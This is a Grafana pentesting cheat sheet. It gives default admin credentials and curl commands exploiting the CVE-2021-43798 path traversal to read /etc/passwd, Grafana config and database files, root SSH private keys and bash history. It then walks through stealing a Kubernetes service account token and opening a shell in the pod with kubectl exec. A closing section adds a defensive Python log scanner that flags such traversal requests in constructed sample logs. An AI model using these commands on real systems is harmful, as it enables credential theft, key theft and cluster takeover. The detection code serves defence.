Grafana Pentesting
Last modified: 2023-01-15
Grafana is a multi-platform analytics and interactive visualization web application.
Default Credentials
admin:admin
admin:prom-operator
Configuration File
The configuration file contains the admin credentials. See the admin_user and admin_password settings in the file.
/etc/grafana/grafana.ini
Path Traversal
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history
Getting a Shell via JWT on the Grafana Pod
Some Grafana versions are vulnerable to path traversal. Kubernetes creates service discovery environment variables in every pod by default, which reveals whether Grafana is running in the cluster.
1. Check Environment Variables on the Target Machine
env
If you see GRAFANA_* environment variables like the following, a Grafana service is running in the cluster.
GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000
2. Access the Grafana Dashboard
You can access the service at http://<grafana-ip>:<grafana-port>.
3. Get the JWT of the Service Account
Use the path traversal vulnerability (CVE-2021-43798). First confirm that the target is vulnerable:
curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd
Then read the service account token (a JWT) mounted in the pod:
curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
4. Decode the JWT and Get Sensitive Information
See JWT Pentesting.
5. Check the Permissions of This Service Account
Using the JWT, list what the service account is allowed to do.
kubectl auth can-i --list --token=<Grafana-JWT>
# List pods
kubectl get pods --token=<JWT>
6. Get a Shell on the Grafana Pod
kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash
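As an added detection example (not from the original page), the following Python script scans access-log lines for requests under /public/plugins/<plugin>/ that resolve outside the plugin directory, which is the request shape used in the Path Traversal section above and in step 3 of the JWT procedure. It decodes percent-encoded segments before normalising, so encoded "..%2f" variants are caught too. The log lines, IP addresses and timestamps are constructed sample data.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed nginx-style access-log lines (sample data, not from any real system).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2023:10:00:01 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 1234
10.0.0.9 - - [15/Jan/2023:10:00:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [15/Jan/2023:10:00:03 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2fetc/grafana/grafana.ini HTTP/1.1" 200 4096
10.0.0.9 - - [15/Jan/2023:10:00:04 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token HTTP/1.1" 200 900
10.0.0.7 - - [15/Jan/2023:10:00:05 +0000] "GET /api/health HTTP/1.1" 200 50
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PREFIX = "/public/plugins/"


def escapes_plugin_dir(raw_path: str) -> bool:
    """True when a /public/plugins/<plugin>/... request resolves outside that plugin's directory."""
    path = unquote(raw_path.split("?", 1)[0])  # decode %2f etc. and drop any query string
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin, _, _ = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin:
        return False
    plugin_root = PLUGIN_PREFIX + plugin
    # normpath collapses "." and ".." segments; a benign request still starts
    # with /public/plugins/<plugin>/ afterwards, a traversal does not.
    resolved = posixpath.normpath(path)
    return not (resolved == plugin_root or resolved.startswith(plugin_root + "/"))


def find_traversal(log_text: str) -> list[dict]:
    """Return one record per log line whose request path escapes its plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_plugin_dir(m["path"]):
            hits.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['path']}")
```

A 200 status on a flagged request is the strongest signal, since a patched Grafana returns an error for these paths; the source IP and the target file (grafana.ini, grafana.db, the service account token) tell you what to rotate.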